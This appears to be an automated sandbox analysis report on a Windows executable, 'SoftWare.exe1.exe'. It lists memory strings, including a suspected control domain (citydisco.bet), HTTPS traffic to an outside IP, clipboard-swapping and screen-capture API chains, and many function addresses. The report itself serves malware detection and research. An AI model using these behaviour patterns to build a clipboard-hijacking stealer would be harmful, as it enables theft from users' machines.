Source: SoftWare.exe1.exe, 00000002.00000003.1010678816.0000000001331000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: SoftWare.exe1.exe, 00000002.00000003.1076778996.000000000132D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet//
Source: SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686782696.0000000001346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: SoftWare.exe1.exe, 00000002.00000003.957107611.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.956104000.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001359000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.955438817.0000000001354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISDZ0c
Source: SoftWare.exe1.exe, 00000002.00000003.955924921.000000000134A000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.955617694.0000000001349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISt4
Source: SoftWare.exe1.exe, 00000002.00000003.1010678816.0000000001331000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1010456185.0000000001327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/s
Source: SoftWare.exe1.exe, 00000002.00000002.2135526996.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686583042.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.985030791.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1686631716.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: SoftWare.exe1.exe, 00000002.00000003.1076846866.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISl
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: SoftWare.exe1.exe, 00000002.00000003.957060993.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SoftWare.exe1.exe, 00000002.00000003.957205964.0000000003D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_00440070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_00440070

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_03891000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03891000

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_00440070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_00440070

Source: C:\Users\user\Desktop\SoftWare.exe1.exe

Code function: 2_2_00440220 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_00440220

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D31F0	0_2_007D31F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D3640	0_2_007D3640
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D6070	0_2_007D6070
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00801890	0_2_00801890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FF060	0_2_007FF060
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E4040	0_2_007E4040
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_008000D0	0_2_008000D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EA820	0_2_007EA820
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E9020	0_2_007E9020
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FA020	0_2_007FA020
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EC010	0_2_007EC010
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D1000	0_2_007D1000
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00803813	0_2_00803813
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D58A0	0_2_007D58A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EE0A0	0_2_007EE0A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D8090	0_2_007D8090
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E0890	0_2_007E0890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F3890	0_2_007F3890
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D4080	0_2_007D4080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FD080	0_2_007FD080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DE170	0_2_007DE170
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D4940	0_2_007D4940
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EC940	0_2_007EC940
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F0110	0_2_007F0110
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F9100	0_2_007F9100
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_0081C908	0_2_0081C908
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EB1E0	0_2_007EB1E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00802920	0_2_00802920
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FF9B0	0_2_007FF9B0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00803160	0_2_00803160
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E6180	0_2_007E6180
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F8A50	0_2_007F8A50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D5220	0_2_007D5220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D9220	0_2_007D9220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F5220	0_2_007F5220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F0A10	0_2_007F0A10
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F6A00	0_2_007F6A00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F8200	0_2_007F8200
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FF2E0	0_2_007FF2E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DF2D0	0_2_007DF2D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E52C0	0_2_007E52C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F9AB0	0_2_007F9AB0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00806A54	0_2_00806A54
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DEAA0	0_2_007DEAA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E4290	0_2_007E4290
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D2280	0_2_007D2280
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EFB70	0_2_007EFB70
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F1370	0_2_007F1370
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F0350	0_2_007F0350
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D8340	0_2_007D8340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FEB40	0_2_007FEB40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DC310	0_2_007DC310
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DB300	0_2_007DB300
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E73F0	0_2_007E73F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EF3D0	0_2_007EF3D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EABA0	0_2_007EABA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D6390	0_2_007D6390
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E3390	0_2_007E3390
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00802480	0_2_00802480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00803C90	0_2_00803C90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F5C60	0_2_007F5C60
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F8450	0_2_007F8450
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D2C40	0_2_007D2C40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EEC40	0_2_007EEC40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F8C40	0_2_007F8C40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D5C20	0_2_007D5C20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_0080B41A	0_2_0080B41A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007ECCE0	0_2_007ECCE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00811420	0_2_00811420
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DE4C0	0_2_007DE4C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E3CC0	0_2_007E3CC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D54A0	0_2_007D54A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E0490	0_2_007E0490
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00803477	0_2_00803477
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D6C80	0_2_007D6C80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E6480	0_2_007E6480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F5480	0_2_007F5480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007ED560	0_2_007ED560
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EDD50	0_2_007EDD50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FFD50	0_2_007FFD50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E8540	0_2_007E8540
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_008035C0	0_2_008035C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D7D30	0_2_007D7D30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DF530	0_2_007DF530
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DAD30	0_2_007DAD30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E9500	0_2_007E9500
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FF5D0	0_2_007FF5D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E55B0	0_2_007E55B0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FEDB0	0_2_007FEDB0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D9580	0_2_007D9580
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FDD80	0_2_007FDD80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00802E90	0_2_00802E90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D4660	0_2_007D4660
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E7E50	0_2_007E7E50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D8640	0_2_007D8640
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E6E40	0_2_007E6E40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EB630	0_2_007EB630
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F9630	0_2_007F9630
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E7620	0_2_007E7620
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E0E20	0_2_007E0E20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00801EF0	0_2_00801EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E26F0	0_2_007E26F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00800620	0_2_00800620
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EC6A0	0_2_007EC6A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E2E90	0_2_007E2E90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F8690	0_2_007F8690
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007FB680	0_2_007FB680
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_0081E782	0_2_0081E782
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007EFF70	0_2_007EFF70
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DE730	0_2_007DE730
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E9720	0_2_007E9720
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F9F00	0_2_007F9F00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D9FF0	0_2_007D9FF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D67D0	0_2_007D67D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007D1790	0_2_007D1790
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007E6790	0_2_007E6790
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007DB780	0_2_007DB780
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_007F0F80	0_2_007F0F80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0042C080	2_2_0042C080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044F1D0	2_2_0044F1D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004452C0	2_2_004452C0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00428570	2_2_00428570
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004375EB	2_2_004375EB
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044E6D0	2_2_0044E6D0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041695B	2_2_0041695B
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0042FA30	2_2_0042FA30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044DAC0	2_2_0044DAC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040BB90	2_2_0040BB90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044EC20	2_2_0044EC20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00436D60	2_2_00436D60
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041EECC	2_2_0041EECC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00444EE0	2_2_00444EE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00421EF0	2_2_00421EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00448F30	2_2_00448F30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00401040	2_2_00401040
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044D050	2_2_0044D050
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00430020	2_2_00430020
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044D0F0	2_2_0044D0F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043E092	2_2_0043E092
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00421094	2_2_00421094
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043C10C	2_2_0043C10C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004101B0	2_2_004101B0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00446240	2_2_00446240
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00426220	2_2_00426220
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004302C1	2_2_004302C1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043B2DE	2_2_0043B2DE
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004242E0	2_2_004242E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040A340	2_2_0040A340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044E340	2_2_0044E340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040C360	2_2_0040C360
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044D380	2_2_0044D380
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043238F	2_2_0043238F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043644C	2_2_0043644C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043E4EB	2_2_0043E4EB
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040F4FC	2_2_0040F4FC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00444480	2_2_00444480
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00429490	2_2_00429490
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040D540	2_2_0040D540
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00403560	2_2_00403560
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00409560	2_2_00409560
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00421510	2_2_00421510
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00433520	2_2_00433520
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044D580	2_2_0044D580
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00413670	2_2_00413670
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043D6D2	2_2_0043D6D2
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004446E0	2_2_004446E0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041F6E9	2_2_0041F6E9
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040C6F0	2_2_0040C6F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041F68B	2_2_0041F68B
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004176B3	2_2_004176B3
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00410700	2_2_00410700
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043D712	2_2_0043D712
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004047E2	2_2_004047E2
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004027A0	2_2_004027A0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00438809	2_2_00438809
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040E82F	2_2_0040E82F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_004278F0	2_2_004278F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043C905	2_2_0043C905
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00431934	2_2_00431934
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044AA44	2_2_0044AA44
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00425A00	2_2_00425A00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00408AC0	2_2_00408AC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043FAE0	2_2_0043FAE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041EB48	2_2_0041EB48
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00402B50	2_2_00402B50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043EBE7	2_2_0043EBE7
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00449BA0	2_2_00449BA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00431C50	2_2_00431C50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00424C00	2_2_00424C00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00430CC8	2_2_00430CC8
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00442CE4	2_2_00442CE4
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0044ACF4	2_2_0044ACF4
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0043ACFB	2_2_0043ACFB
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041BC90	2_2_0041BC90
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040FCA0	2_2_0040FCA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0040AD40	2_2_0040AD40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041CD4F	2_2_0041CD4F
